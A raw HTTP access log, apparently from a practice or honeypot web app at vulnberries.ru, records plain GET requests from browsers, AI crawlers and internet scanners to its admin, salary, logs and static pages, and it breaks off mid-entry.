User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /cabinet
URL: /cabinet
Method: GET
[2026-04-08 16:12:36] === HTTP Request ===
===================
X-Forwarded-For: 107.172.195.5
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /https:/fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap
URL: /https%3A/fonts.googleapis.com/css2%3Ffamily%3DInter%3Awght%40400%3B500%3B600%3B700%26display%3Dswap
Method: GET
[2026-04-08 16:12:36] === HTTP Request ===
[2026-04-08 16:12:36] Main page accessed - IP: 172.30.0.12:57954
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
X-Forwarded-Proto: https
X-Forwarded-For: 107.172.195.5
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /
URL: /
Method: GET
[2026-04-08 16:12:36] === HTTP Request ===
[2026-04-08 16:12:28] Main page accessed - IP: 172.30.0.12:57954
===================
X-Forwarded-Host: admin.vulnberries.ru
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
X-Forwarded-For: 107.172.195.5
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /
URL: /
Method: GET
[2026-04-08 16:12:28] === HTTP Request ===
[2026-04-08 16:12:19] Main page accessed - IP: 172.30.0.12:57954
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
X-Forwarded-Proto: https
X-Forwarded-For: 107.172.195.5
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /
URL: /
Method: GET
[2026-04-08 16:12:19] === HTTP Request ===
[2026-04-08 16:11:08] Main page accessed - IP: 172.30.0.12:57954
===================
Accept-Encoding: gzip, br, zstd, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 216.73.216.208
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /
URL: /
Method: GET
[2026-04-08 16:11:08] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 216.73.216.208
Via: 2.0 Caddy
Accept-Encoding: gzip, br, zstd, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-08 16:11:07] === HTTP Request ===
===================
X-Forwarded-For: 216.73.216.208
Via: 2.0 Caddy
Accept-Encoding: gzip, br, zstd, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57954
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-08 16:11:07] === HTTP Request ===
[2026-04-08 15:57:28] Main page accessed - IP: 172.236.228.227:31702
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.236.228.227:31702
Path: /
URL: /
Method: GET
[2026-04-08 15:57:28] === HTTP Request ===
[2026-04-08 15:51:11] Main page accessed - IP: 172.30.0.12:45646
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 91.184.244.208
Via: 1.1 Caddy
Accept: */*
User-Agent: Mozilla/5.0(WindowsNT6.2)AppleWebKit/537.36(KHTML,likeGecko)Chrome/31.0.1650.63Safari/537.36
Accept-Encoding: gzip
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /
URL: /
Method: GET
[2026-04-08 15:51:11] === HTTP Request ===
[2026-04-08 15:51:11] Main page accessed - IP: 172.30.0.12:45646
===================
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 91.184.244.208
Via: 1.1 Caddy
Accept: */*
User-Agent: Mozilla/5.0(WindowsNT6.2)AppleWebKit/537.36(KHTML,likeGecko)Chrome/31.0.1650.63Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /
URL: /
Method: GET
[2026-04-08 15:51:11] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 107.172.195.45
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept: */*;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-04-08 15:50:00] === HTTP Request ===
===================
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 107.172.195.45
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-04-08 15:50:00] === HTTP Request ===
[2026-04-08 15:50:00] Login page accessed - IP: 172.30.0.12:55052
===================
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
X-Forwarded-For: 107.172.195.45
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55052
Path: /login
URL: /login
Method: GET
[2026-04-08 15:50:00] === HTTP Request ===
[2026-04-08 15:49:59] Logs page accessed - IP: 172.30.0.12:45646
===================
X-Forwarded-For: 107.172.195.45
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /logs
URL: /logs
Method: GET
[2026-04-08 15:49:59] === HTTP Request ===
[2026-04-08 15:49:59] Salary page accessed - IP: 172.30.0.12:45646
===================
X-Forwarded-Proto: https
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 107.172.195.45
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /salary
URL: /salary
Method: GET
[2026-04-08 15:49:59] === HTTP Request ===
[2026-04-08 15:49:58] Goods page accessed - IP: 172.30.0.12:45646
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-For: 107.172.195.45
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /goods
URL: /goods
Method: GET
[2026-04-08 15:49:58] === HTTP Request ===
[2026-04-08 15:49:58] Defects page accessed - IP: 172.30.0.12:45646
===================
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 107.172.195.45
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /defects
URL: /defects
Method: GET
[2026-04-08 15:49:58] === HTTP Request ===
[2026-04-08 15:49:57] Cabinet page accessed - user_id: , IP: 172.30.0.12:45646
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 107.172.195.45
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /cabinet
URL: /cabinet
Method: GET
[2026-04-08 15:49:57] === HTTP Request ===
[2026-04-08 15:49:56] Main page accessed - IP: 172.30.0.12:45646
===================
X-Forwarded-For: 107.172.195.45
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /
URL: /
Method: GET
[2026-04-08 15:49:56] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: 107.172.195.45
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /https:/fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap
URL: /https%3A/fonts.googleapis.com/css2%3Ffamily%3DInter%3Awght%40400%3B500%3B600%3B700%26display%3Dswap
Method: GET
[2026-04-08 15:49:56] === HTTP Request ===
[2026-04-08 15:49:43] Main page accessed - IP: 172.30.0.12:45646
===================
X-Forwarded-Proto: https
X-Forwarded-For: 107.172.195.45
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /
URL: /
Method: GET
[2026-04-08 15:49:43] === HTTP Request ===
[2026-04-08 15:49:32] Main page accessed - IP: 172.30.0.12:45646
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
X-Forwarded-For: 107.172.195.45
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45646
Path: /
URL: /
Method: GET
[2026-04-08 15:49:32] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 195.86.5.85:35326
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-08 15:47:17] === HTTP Request ===
[2026-04-08 15:47:17] Main page accessed - IP: 195.86.5.85:35326
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 195.86.5.85:35326
Path: /
URL: /
Method: GET
[2026-04-08 15:47:17] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 195.86.5.85:35326
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-08 15:47:17] === HTTP Request ===
[2026-04-08 15:47:17] Main page accessed - IP: 195.86.5.85:35326
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 195.86.5.85:35326
Path: /
URL: /
Method: GET
[2026-04-08 15:47:17] === HTTP Request ===
===================
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:36062
Path: /jars
URL: /jars
Method: GET
[2026-04-08 15:32:21] === HTTP Request ===
===================
X-Forwarded-For: 74.7.227.27
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50250
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-04-08 15:30:56] === HTTP Request ===
[2026-04-08 15:30:53] Defects page accessed - IP: 172.30.0.12:50250
===================
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.227.27
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50250
Path: /defects
URL: /defects
Method: GET
[2026-04-08 15:30:53] === HTTP Request ===
[2026-04-08 15:30:51] Salary page accessed - IP: 172.30.0.12:50250
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.227.27
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50250
Path: /salary
URL: /salary
Method: GET
[2026-04-08 15:30:51] === HTTP Request ===
[2026-04-08 15:30:49] Goods page accessed - IP: 172.30.0.12:50250
===================
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.27
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50250
Path: /goods
URL: /goods
Method: GET
[2026-04-08 15:30:49] === HTTP Request ===
[2026-04-08 15:30:46] Logs page accessed - IP: 172.30.0.12:50250
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.27
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50250
Path: /logs
URL: /logs
Method: GET
[2026-04-08 15:30:46] === HTTP Request ===
[2026-04-08 15:30:44] Main page accessed - IP: 172.30.0.12:50250
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.27
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50250
Path: /
URL: /
Method: GET
[2026-04-08 15:30:44] === HTTP Request ===
===================
X-Forwarded-Proto: https
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.230.41
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50250
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-08 15:30:42] === HTTP Request ===
[2026-04-08 15:09:19] Main page accessed - IP: 172.30.0.12:40886
===================
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 91.231.89.33
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40886
Path: /
URL: /
Method: GET
[2026-04-08 15:09:19] === HTTP Request ===
[2026-04-08 15:04:43] Main page accessed - IP: 172.30.0.12:33072
===================
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 91.196.152.162
X-Forwarded-Proto: https
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33072
Path: /
URL: /
Method: GET
[2026-04-08 15:04:43] === HTTP Request ===
[2026-04-08 15:04:06] Main page accessed - IP: 205.210.31.241:59484
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: assets.vulnberries.ru
RemoteAddr: 205.210.31.241:59484
Path: /
URL: /
Method: GET
[2026-04-08 15:04:06] === HTTP Request ===
[2026-04-08 15:03:51] Main page accessed - IP: 172.30.0.12:33072
===================
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Proto: https
Accept-Encoding: gzip
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 91.231.89.103
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33072
Path: /
URL: /
Method: GET
[2026-04-08 15:03:51] === HTTP Request ===
[2026-04-08 14:51:04] Main page accessed - IP: 172.30.0.12:58064
===================
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0(compatible;MSIE10.0;WindowsNT6.1;WOW64;Trident/6.0;SLCC2;.NETCLR2.0.50727;.NETCLR3.5.30729;.NETCLR3.0.30729;MediaCenterPC6.0;MAAU;.NET4.0C;InfoPath.2)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 62.113.113.43
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58064
Path: /
URL: /
Method: GET
[2026-04-08 14:51:04] === HTTP Request ===
[2026-04-08 14:51:04] Main page accessed - IP: 172.30.0.12:58064
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 62.113.113.43
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0(compatible;MSIE10.0;WindowsNT6.1;WOW64;Trident/6.0;SLCC2;.NETCLR2.0.50727;.NETCLR3.5.30729;.NETCLR3.0.30729;MediaCenterPC6.0;MAAU;.NET4.0C;InfoPath.2)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58064
Path: /
URL: /
Method: GET
[2026-04-08 14:51:04] === HTTP Request ===
[2026-04-08 14:50:45] Main page accessed - IP: 147.185.132.135:61868
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: image.vulnberries.ru
RemoteAddr: 147.185.132.135:61868
Path: /
URL: /
Method: GET
[2026-04-08 14:50:45] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Via: 1.1 Caddy
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 103.4.250.158
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
